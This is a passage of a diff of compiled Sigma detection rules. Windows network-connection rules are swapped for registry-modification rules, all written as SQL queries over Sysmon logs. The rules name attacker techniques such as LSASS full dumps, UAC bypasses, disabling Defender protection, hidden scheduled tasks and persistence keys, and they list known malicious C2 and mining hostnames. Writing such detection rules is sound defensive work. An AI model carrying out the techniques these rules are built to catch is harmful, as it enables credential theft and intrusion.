'%\\\\SilentProcessExit\\\\%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\ReportingMode%' ESCAPE '\\' OR TargetObject LIKE '%\\\\MonitorProcess%' ESCAPE '\\'))" ], - "filename": "net_connection_win_susp_cmstp.yml" + "filename": "registry_set_persistence_globalflags.yml" }, { - "title": "Suspicious Dropbox API Usage", - "id": "25eabf56-22f0-4915-a1ed-056b8dae0a68", + "title": "New RUN Key Pointing to Suspicious Folder", + "id": "02ee49e2-e294-4d0f-9278-f5b3212fc588", "status": "experimental", - "description": "Detects an executable that isn't dropbox but communicates with the Dropbox API", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects suspicious new RUN key element pointing to an executable in a suspicious folder", + "author": "Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing", + "tags": [ + "attack.persistence", + "attack.t1547.001" + ], "falsepositives": [ - "Legitimate use of the API with a tool that the author wasn't aware of" + "Software using weird folders for updates" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Initiated = 'true' AND (DestinationHostname LIKE '%api.dropboxapi.com' ESCAPE '\\' OR DestinationHostname LIKE '%content.dropboxapi.com' ESCAPE '\\')) AND NOT (Image LIKE '%\\\\Dropbox%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\%' ESCAPE '\\')) AND ((Details LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR Details LIKE '%C:\\\\$Recycle.bin\\\\%' ESCAPE '\\' OR Details LIKE '%C:\\\\Temp\\\\%' ESCAPE '\\' OR Details LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Details LIKE '%C:\\\\Users\\\\Default\\\\%' ESCAPE '\\' OR Details LIKE 
'%C:\\\\Users\\\\Desktop\\\\%' ESCAPE '\\' OR Details LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR Details LIKE '%\\%temp\\%\\\\%' ESCAPE '\\' OR Details LIKE '%\\%tmp\\%\\\\%' ESCAPE '\\') OR (Details LIKE '\\%Public\\%\\\\%' ESCAPE '\\' OR Details LIKE 'wscript%' ESCAPE '\\' OR Details LIKE 'cscript%' ESCAPE '\\')))" ], - "filename": "net_connection_win_susp_dropbox_api.yml" + "filename": "registry_set_susp_run_key_img_folder.yml" }, { - "title": "RDP to HTTP or HTTPS Target Ports", - "id": "b1e5da3b-ca8e-4adf-915c-9921f3d85481", + "title": "COM Hijack via Sdclt", + "id": "07743f65-7ec9-404a-a519-913db7118a8d", + "status": "test", + "description": "Detects changes to 'HKCU\\Software\\Classes\\Folder\\shell\\open\\command\\DelegateExecute'", + "author": "Omkar Gudhate", + "tags": [ + "attack.privilege_escalation", + "attack.t1546", + "attack.t1548" + ], + "falsepositives": [ + "Unknown" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'Setvalue' AND TargetObject LIKE 'HKCU\\\\Software\\\\Classes\\\\Folder\\\\shell\\\\open\\\\command\\\\DelegateExecute' ESCAPE '\\')" + ], + "filename": "registry_set_comhijack_sdclt.yml" + }, + { + "title": "Add Port Monitor Persistence in Registry", + "id": "944e8941-f6f6-4ee8-ac05-1c224e923c0e", "status": "experimental", - "description": "Detects svchost hosting RDP termsvcs communicating to target systems on TCP port 80 or 443", - "author": "Florian Roth (Nextron Systems)", + "description": "Adversaries may use port monitors to run an attacker supplied DLL during system boot for persistence or privilege escalation.\nA port monitor can be set through the AddMonitor API call to set a DLL to be loaded at startup.\n", + "author": "frack113", "tags": [ - "attack.command_and_control", - "attack.t1572", - "attack.lateral_movement", - "attack.t1021.001", - "car.2013-07-002" + "attack.persistence", + "attack.t1547.010" ], 
"falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\svchost.exe' ESCAPE '\\' AND Initiated = 'true' AND SourcePort = '3389' AND DestinationPort IN ('80', '443'))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Control\\\\Print\\\\Monitors\\\\%' ESCAPE '\\' AND Details LIKE '%.dll' ESCAPE '\\' AND EventType = 'SetValue') AND NOT ((Image LIKE 'C:\\\\Windows\\\\System32\\\\spoolsv.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\System\\\\CurrentControlSet\\\\Control\\\\Print\\\\Monitors\\\\CutePDF Writer Monitor v4.0\\\\Driver%' ESCAPE '\\' AND Details LIKE 'cpwmon64\\_v40.dll' ESCAPE '\\' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')) OR (TargetObject LIKE '%Control\\\\Print\\\\Monitors\\\\MONVNC\\\\Driver%' ESCAPE '\\') OR (TargetObject LIKE '%Control\\\\Print\\\\Environments\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Drivers\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\VNC Printer%' ESCAPE '\\')))" ], - "filename": "net_connection_win_rdp_to_http.yml" + "filename": "registry_set_add_port_monitor.yml" }, { - "title": "Microsoft Binary Github Communication", - "id": "635dbb88-67b3-4b41-9ea5-a3af2dd88153", - "status": "test", - "description": "Detects an executable in the Windows folder accessing github.com", - "author": "Michael Haag (idea), Florian Roth (Nextron Systems)", + "title": "Hide Schedule Task Via Index Value Tamper", + "id": "5b16df71-8615-4f7f-ac9b-6c43c0509e61", + "status": "experimental", + "description": "Detects when the \"index\" value of a scheduled task is modified from the registry\nWhich effectively hides it from any tooling such as \"schtasks /query\" (Read the referenced link for more information about the effects of this technique)\n", + "author": "Nasreddine Bencherchali 
(Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.t1105", - "attack.exfiltration", - "attack.t1567.001" + "attack.defense_evasion", + "attack.t1562" ], "falsepositives": [ - "Unknown", - "@subTee in your network" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Initiated = 'true' AND (DestinationHostname LIKE '%.github.com' ESCAPE '\\' OR DestinationHostname LIKE '%.githubusercontent.com' ESCAPE '\\') AND Image LIKE 'C:\\\\Windows\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Schedule\\\\TaskCache\\\\Tree\\\\%' ESCAPE '\\' AND TargetObject LIKE '%Index%' ESCAPE '\\' AND Details = 'DWORD (0x00000000)')" ], - "filename": "net_connection_win_binary_github_com.yml" + "filename": "registry_set_hide_scheduled_task_via_index_tamper.yml" }, { - "title": "Silenttrinity Stager Msbuild Activity", - "id": "50e54b8d-ad73-43f8-96a1-5191685b17a4", + "title": "Changing RDP Port to Non Standard Number", + "id": "509e84b9-a71a-40e0-834f-05470369bd1e", "status": "test", - "description": "Detects a possible remote connections to Silenttrinity c2", - "author": "Kiran kumar s, oscd.community", + "description": "Remote desktop is a common feature in operating systems.\nIt allows a user to log into an interactive session with a system desktop graphical user interface on a remote system.\nMicrosoft refers to its implementation of the Remote Desktop Protocol (RDP) as Remote Desktop Services (RDS).\n", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1127.001" + "attack.persistence", + "attack.t1547.010" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE 
'%\\\\msbuild.exe' ESCAPE '\\' AND DestinationPort IN ('80', '443') AND Initiated = 'true')" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Control\\\\Terminal Server\\\\WinStations\\\\RDP-Tcp\\\\PortNumber' ESCAPE '\\') AND NOT (Details = 'DWORD (0x00000d3d)'))" ], - "filename": "net_connection_win_silenttrinity_stager_msbuild_activity.yml" + "filename": "registry_set_change_rdp_port.yml" }, { - "title": "Windows Crypto Mining Pool Connections", - "id": "fa5b1358-b040-4403-9868-15f7d9ab6329", - "status": "stable", - "description": "Detects process connections to a Monero crypto mining pool", - "author": "Florian Roth (Nextron Systems)", + "title": "Lsass Full Dump Request Via DumpType Registry Settings", + "id": "33efc23c-6ea2-4503-8cfe-bdf82ce8f719", + "status": "experimental", + "description": "Detects the setting of the \"DumpType\" registry value to \"2\" which stands for a \"Full Dump\". 
Technique such as LSASS Shtinkering requires this value to be \"2\" in order to dump LSASS.", + "author": "@pbssubhash", "tags": [ - "attack.impact", - "attack.t1496" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ - "Legitimate use of crypto miners" + "Legitimate application that needs to do a full dump of their process" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND DestinationHostname IN ('pool.minexmr.com', 'fr.minexmr.com', 'de.minexmr.com', 'sg.minexmr.com', 'ca.minexmr.com', 'us-west.minexmr.com', 'pool.supportxmr.com', 'mine.c3pool.com', 'xmr-eu1.nanopool.org', 'xmr-eu2.nanopool.org', 'xmr-us-east1.nanopool.org', 'xmr-us-west1.nanopool.org', 'xmr-asia1.nanopool.org', 'xmr-jp1.nanopool.org', 'xmr-au1.nanopool.org', 'xmr.2miners.com', 'xmr.hashcity.org', 'xmr.f2pool.com', 'xmrpool.eu', 'pool.hashvault.pro', 'moneroocean.stream', 'monerocean.stream'))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\Windows Error Reporting\\\\LocalDumps\\\\DumpType%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\Windows Error Reporting\\\\LocalDumps\\\\lsass.exe\\\\DumpType%' ESCAPE '\\') AND Details = 'DWORD (0x00000002)')" ], - "filename": "net_connection_win_crypto_mining.yml" + "filename": "registry_set_lsass_usermode_dumping.yml" }, { - "title": "Suspicious Epmap Connection", - "id": "628d7a0b-7b84-4466-8552-e6138bc03b43", + "title": "Disable PUA Protection on Windows Defender", + "id": "8ffc5407-52e3-478f-9596-0a7371eafe13", "status": "experimental", - "description": "Detects suspicious \"epmap\" connection to a remote computer via remote procedure call (RPC)", - "author": "frack113, Tim Shelton (fps)", + "description": "Detects disabling Windows Defender PUA protection", + "author": "Austin 
Songer @austinsonger", "tags": [ - "attack.lateral_movement" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Protocol = 'tcp' AND Initiated = 'true' AND DestinationPort = '135') AND NOT ((Image LIKE 'C:\\\\Windows\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\ProgramData\\\\Amazon\\\\SSM\\\\Update\\\\amazon-ssm-agent-updater%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Policies\\\\Microsoft\\\\Windows Defender\\\\PUAProtection%' ESCAPE '\\' AND Details = 'DWORD (0x00000000)')" ], - "filename": "net_connection_win_susp_epmap.yml" + "filename": "registry_set_disabled_pua_protection_on_microsoft_defender.yml" }, { - "title": "Dead Drop Resolvers", - "id": "297ae038-edc2-4b2e-bb3e-7c5fc94dd5c7", + "title": "Potential Registry Persistence Attempt Via Windows Telemetry", + "id": "73a883d0-0348-4be4-a8d8-51031c2564f8", "status": "test", - "description": "Detects an executable, which is not an internet browser, making DNS request to legit popular websites, which were seen to be used as dead drop resolvers in previous attacks.", - "author": "Sorina Ionescu", + "description": "Detects potential persistence behaviour using the windows telemetry registry key.\nWindows telemetry makes use of the binary CompatTelRunner.exe to run a variety of commands and perform the actual telemetry collections.\nThis binary was created to be easily extensible, and to that end, it relies on the registry to instruct on which commands to run.\nThe problem is, it will run any arbitrary command without restriction of location or type.\n", + "author": "Lednyov Alexey, oscd.community, Sreeman", "tags": [ - "attack.command_and_control", - "attack.t1102", - "attack.t1102.001" + "attack.persistence", + "attack.t1053.005" ], 
"falsepositives": [ - "One might need to exclude other internet browsers found in it's network or other applications like ones mentioned above from Microsoft Defender." + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Initiated = 'true' AND (DestinationHostname LIKE '%cdn.discordapp.com' ESCAPE '\\' OR DestinationHostname LIKE '%pastebin.com' ESCAPE '\\' OR DestinationHostname LIKE '%youtube.com' ESCAPE '\\' OR DestinationHostname LIKE '%technet.microsoft.com' ESCAPE '\\' OR DestinationHostname LIKE '%facebook.com' ESCAPE '\\' OR DestinationHostname LIKE '%.cloudflare.com' ESCAPE '\\' OR DestinationHostname LIKE '%docs.google.com' ESCAPE '\\' OR DestinationHostname LIKE '%steamcommunity.com' ESCAPE '\\' OR DestinationHostname LIKE '%reddit.com' ESCAPE '\\' OR DestinationHostname LIKE '%fotolog.com' ESCAPE '\\' OR DestinationHostname LIKE '%twitter.com' ESCAPE '\\' OR DestinationHostname LIKE '%imgur.com' ESCAPE '\\' OR DestinationHostname LIKE '%feeds.rapidfeeds.com' ESCAPE '\\' OR DestinationHostname LIKE '%livejournal.com' ESCAPE '\\' OR DestinationHostname LIKE '%.githubusercontent.com' ESCAPE '\\' OR DestinationHostname LIKE '%pastetext.net' ESCAPE '\\' OR DestinationHostname LIKE '%pastebin.pl' ESCAPE '\\' OR DestinationHostname LIKE '%paste.ee' ESCAPE '\\')) AND NOT (((Image LIKE '%\\\\iexplore.exe' ESCAPE '\\' OR Image LIKE '%\\\\msedge.exe' ESCAPE '\\' OR Image LIKE '%\\\\edge.exe' ESCAPE '\\' OR Image LIKE '%\\\\opera.exe' ESCAPE '\\' OR Image LIKE '%\\\\brave.exe' ESCAPE '\\' OR Image LIKE '%\\\\vivaldi.exe' ESCAPE '\\' OR Image LIKE '%\\\\whale.exe' ESCAPE '\\' OR Image LIKE '%\\\\chrome.exe' ESCAPE '\\' OR Image LIKE '%\\\\firefox.exe' ESCAPE '\\')) OR ((Image LIKE '%\\\\MsMpEng.exe' ESCAPE '\\' OR Image LIKE '%\\\\MsSense.exe' ESCAPE '\\' OR Image LIKE '%\\\\PRTG Probe.exe' ESCAPE '\\' OR Image LIKE '%\\\\Engine.exe' ESCAPE '\\' OR Image LIKE 
'%\\\\msedgewebview2.exe' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\AppCompatFlags\\\\TelemetryController\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Command' ESCAPE '\\' AND (Details LIKE '%.sh%' ESCAPE '\\' OR Details LIKE '%.exe%' ESCAPE '\\' OR Details LIKE '%.dll%' ESCAPE '\\' OR Details LIKE '%.bin%' ESCAPE '\\' OR Details LIKE '%.bat%' ESCAPE '\\' OR Details LIKE '%.cmd%' ESCAPE '\\' OR Details LIKE '%.js%' ESCAPE '\\' OR Details LIKE '%.ps%' ESCAPE '\\' OR Details LIKE '%.vb%' ESCAPE '\\' OR Details LIKE '%.jar%' ESCAPE '\\' OR Details LIKE '%.hta%' ESCAPE '\\' OR Details LIKE '%.msi%' ESCAPE '\\' OR Details LIKE '%.vbs%' ESCAPE '\\')) AND NOT ((Details LIKE '%\\\\system32\\\\CompatTelRunner.exe%' ESCAPE '\\' OR Details LIKE '%\\\\system32\\\\DeviceCensus.exe%' ESCAPE '\\')))" ], - "filename": "net_connection_win_dead_drop_resolvers.yml" + "filename": "registry_set_telemetry_persistence.yml" }, { - "title": "Certutil Initiated Connection", - "id": "0dba975d-a193-4ed1-a067-424df57570d1", - "status": "experimental", - "description": "Detects a network connection intitiated by the certutil.exe tool. 
Attackers can abuse `certutil.exe` to download malware or offensive security tools.", - "author": "frack113, Florian Roth", + "title": "Bypass UAC Using SilentCleanup Task", + "id": "724ea201-6514-4f38-9739-e5973c34f49a", + "status": "test", + "description": "There is an auto-elevated task called SilentCleanup located in %windir%\\system32\\cleanmgr.exe This can be abused to elevate any file with Administrator privileges without prompting UAC", + "author": "frack113", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.privilege_escalation", + "attack.defense_evasion", + "attack.t1548.002" ], "falsepositives": [ - "Legitimate certutil network connection" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\certutil.exe' ESCAPE '\\' AND Initiated = 'true' AND DestinationPort IN ('80', '443', '135', '445'))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%\\\\Environment\\\\windir' ESCAPE '\\' AND Details LIKE '%&REM%' ESCAPE '\\' AND EventType = 'SetValue')" ], - "filename": "net_connection_win_certutil.yml" + "filename": "registry_set_bypass_uac_using_silentcleanup_task.yml" }, { - "title": "Equation Editor Network Connection", - "id": "a66bc059-c370-472c-a0d7-f8fd1bf9d583", + "title": "Bypass UAC Using Event Viewer", + "id": "674202d0-b22a-4af4-ae5f-2eda1f3da1af", "status": "experimental", - "description": "Detects network connections from Equation Editor", - "author": "Max Altgelt (Nextron Systems)", + "description": "Bypasses User Account Control using Event Viewer and a relevant Windows Registry modification", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1203" + "attack.persistence", + "attack.t1547.010" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '3' AND Channel = 
'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\eqnedt32.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\_Classes\\\\mscfile\\\\shell\\\\open\\\\command\\\\(Default)' ESCAPE '\\') AND NOT (Details LIKE '\\%SystemRoot\\%\\\\system32\\\\mmc.exe \"\\%1\" \\%%' ESCAPE '\\'))" ], - "filename": "net_connection_win_eqnedt.yml" + "filename": "registry_set_bypass_uac_using_eventviewer.yml" }, { - "title": "Suspicious Outbound Kerberos Connection", - "id": "e54979bd-c5f9-4d6c-967b-a04b19ac4c74", - "status": "test", - "description": "Detects suspicious outbound network activity via kerberos default port indicating possible lateral movement or first stage PrivEsc via delegation.", - "author": "Ilyas Ochkov, oscd.community", + "title": "VBScript Payload Stored in Registry", + "id": "46490193-1b22-4c29-bdd6-5bf63907216f", + "status": "experimental", + "description": "Detects VBScript content stored into registry keys as seen being used by UNC2452 group", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1558", - "attack.lateral_movement", - "attack.t1550.003" + "attack.persistence", + "attack.t1547.001" ], "falsepositives": [ - "Web Browsers" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (DestinationPort = '88' AND Initiated = 'true') AND NOT (((Image LIKE 'C:\\\\Windows\\\\System32\\\\lsass.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%Software\\\\Microsoft\\\\Windows\\\\CurrentVersion%' ESCAPE '\\' 
AND (Details LIKE '%vbscript:%' ESCAPE '\\' OR Details LIKE '%jscript:%' ESCAPE '\\' OR Details LIKE '%mshtml,%' ESCAPE '\\' OR Details LIKE '%RunHTMLApplication%' ESCAPE '\\' OR Details LIKE '%Execute(%' ESCAPE '\\' OR Details LIKE '%CreateObject%' ESCAPE '\\' OR Details LIKE '%window.close%' ESCAPE '\\')) AND NOT ((TargetObject LIKE '%Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run%' ESCAPE '\\') OR (Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Installer\\\\UserData\\\\%' ESCAPE '\\' AND (Details LIKE '%\\\\Microsoft.NET\\\\Primary Interop Assemblies\\\\Microsoft.mshtml.dll%' ESCAPE '\\' OR Details LIKE '%<\\\\Microsoft.mshtml,fileVersion=%' ESCAPE '\\' OR Details LIKE '%\\_mshtml\\_dll\\_%' ESCAPE '\\' OR Details LIKE '%<\\\\Microsoft.mshtml,culture=%' ESCAPE '\\'))))" ], - "filename": "net_connection_win_susp_outbound_kerberos_connection.yml" + "filename": "registry_set_vbs_payload_stored.yml" }, { - "title": "Script Initiated Connection to Non-Local Network", - "id": "992a6cae-db6a-43c8-9cec-76d7195c96fc", + "title": "Disabled RestrictedAdminMode For RDS", + "id": "d6ce7ebd-260b-4323-9768-a9631c8d4db2", "status": "experimental", - "description": "Detects a script interpreter wscript/cscript opening a network connection to a non-local network. 
Adversaries may use script to download malicious payloads.", - "author": "frack113, Florian Roth", + "description": "Detect activation of DisableRestrictedAdmin to desable RestrictedAdmin mode.\nRestrictedAdmin mode prevents the transmission of reusable credentials to the remote system to which you connect using Remote Desktop.\nThis prevents your credentials from being harvested during the initial connection process if the remote server has been compromise\n", + "author": "frack113", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.defense_evasion", + "attack.t1112" ], "falsepositives": [ - "Legitimate scripts" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Initiated = 'true' AND (Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\')) AND NOT (((DestinationIp LIKE '127.%' ESCAPE '\\' OR DestinationIp LIKE '10.%' ESCAPE '\\' OR DestinationIp LIKE '172.%' ESCAPE '\\' OR DestinationIp LIKE '192.%' ESCAPE '\\' OR DestinationIp LIKE '169.254.%' ESCAPE '\\' OR DestinationIp LIKE '20.%' ESCAPE '\\')) OR ((DestinationIp LIKE '::1%' ESCAPE '\\' OR DestinationIp LIKE '0:0:0:0:0:0:0:1%' ESCAPE '\\' OR DestinationIp LIKE 'fe80:%' ESCAPE '\\' OR DestinationIp LIKE 'fc%' ESCAPE '\\' OR DestinationIp LIKE 'fd%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%System\\\\CurrentControlSet\\\\Control\\\\Lsa\\\\DisableRestrictedAdmin' ESCAPE '\\' AND Details = 'DWORD (0x00000001)')" ], - "filename": "net_connection_win_script_wan.yml" + "filename": "registry_set_lsa_disablerestrictedadmin.yml" }, { - "title": "Potential Compromised 3CXDesktopApp Beaconing Activity - Netcon", - "id": "51eecf75-d069-43c7-9ea2-63f75499edd4", + "title": "Change User Account Associated with the FAX Service", + "id": 
"e3fdf743-f05b-4051-990a-b66919be1743", "status": "experimental", - "description": "Detects potential beaconing activity to domains related to 3CX 3CXDesktopApp compromise", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detect change of the user account associated with the FAX service to avoid the escalation problem.", + "author": "frack113", "tags": [ - "attack.command_and_control" + "attack.defense_evasion", + "attack.t1112" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\3CXDesktopApp.exe' ESCAPE '\\' AND (DestinationHostname LIKE '%akamaicontainer.com%' ESCAPE '\\' OR DestinationHostname LIKE '%akamaitechcloudservices.com%' ESCAPE '\\' OR DestinationHostname LIKE '%azuredeploystore.com%' ESCAPE '\\' OR DestinationHostname LIKE '%azureonlinecloud.com%' ESCAPE '\\' OR DestinationHostname LIKE '%azureonlinestorage.com%' ESCAPE '\\' OR DestinationHostname LIKE '%dunamistrd.com%' ESCAPE '\\' OR DestinationHostname LIKE '%glcloudservice.com%' ESCAPE '\\' OR DestinationHostname LIKE '%journalide.org%' ESCAPE '\\' OR DestinationHostname LIKE '%msedgepackageinfo.com%' ESCAPE '\\' OR DestinationHostname LIKE '%msstorageazure.com%' ESCAPE '\\' OR DestinationHostname LIKE '%msstorageboxes.com%' ESCAPE '\\' OR DestinationHostname LIKE '%officeaddons.com%' ESCAPE '\\' OR DestinationHostname LIKE '%officestoragebox.com%' ESCAPE '\\' OR DestinationHostname LIKE '%pbxcloudeservices.com%' ESCAPE '\\' OR DestinationHostname LIKE '%pbxphonenetwork.com%' ESCAPE '\\' OR DestinationHostname LIKE '%pbxsources.com%' ESCAPE '\\' OR DestinationHostname LIKE '%qwepoi123098.com%' ESCAPE '\\' OR DestinationHostname LIKE '%sbmsa.wiki%' ESCAPE '\\' OR DestinationHostname LIKE '%sourceslabs.com%' ESCAPE '\\' OR DestinationHostname LIKE '%visualstudiofactory.com%' ESCAPE '\\' OR DestinationHostname LIKE 
'%zacharryblogs.com%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\Fax\\\\ObjectName' ESCAPE '\\' AND NOT (Details LIKE '%NetworkService%' ESCAPE '\\'))" ], - "filename": "net_connection_win_malware_3cx_compromise_beaconing_activity.yml" + "filename": "registry_set_fax_change_service_user.yml" }, { - "title": "Regsvr32 Network Activity", - "id": "c7e91a02-d771-4a6d-a700-42587e0b1095", - "status": "test", - "description": "Detects network connections and DNS queries initiated by Regsvr32.exe", - "author": "Dmitriy Lifanov, oscd.community", + "title": "Potential Signing Bypass Via Windows Developer Features - Registry", + "id": "b110ebaf-697f-4da1-afd5-b536fa27a2c1", + "status": "experimental", + "description": "Detects when the enablement of developer features such as \"Developer Mode\" or \"Application Sideloading\". Which allows the user to install untrusted packages.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1559.001", - "attack.defense_evasion", - "attack.t1218.010" + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\AppModelUnlock%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Policies\\\\Microsoft\\\\Windows\\\\Appx\\\\%' ESCAPE '\\') AND (TargetObject LIKE '%\\\\AllowAllTrustedApps' ESCAPE '\\' OR TargetObject LIKE '%\\\\AllowDevelopmentWithoutDevLicense' ESCAPE '\\') AND Details = 'DWORD (0x00000001)')" ], - "filename": "net_connection_win_regsvr32_network_activity.yml" + "filename": 
"registry_set_turn_on_dev_features.yml" }, { - "title": "RDP Over Reverse SSH Tunnel", - "id": "5f699bc5-5446-4a4a-a0b7-5ef2885a3eb4", - "status": "test", - "description": "Detects svchost hosting RDP termsvcs communicating with the loopback address and on TCP port 3389", - "author": "Samir Bousseaden", + "title": "Potential Persistence Via CHM Helper DLL", + "id": "976dd1f2-a484-45ec-aa1d-0e87e882262b", + "status": "experimental", + "description": "Detects when an attacker modifies the registry key \"HtmlHelp Author\" to achieve persistence", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1572", - "attack.lateral_movement", - "attack.t1021.001", - "car.2013-07-002" + "attack.persistence" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\svchost.exe' ESCAPE '\\' AND Initiated = 'true' AND SourcePort = '3389') AND (DestinationIp LIKE '127.%' ESCAPE '\\' OR DestinationIp = '::1'))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\HtmlHelp Author\\\\Location%' ESCAPE '\\' OR 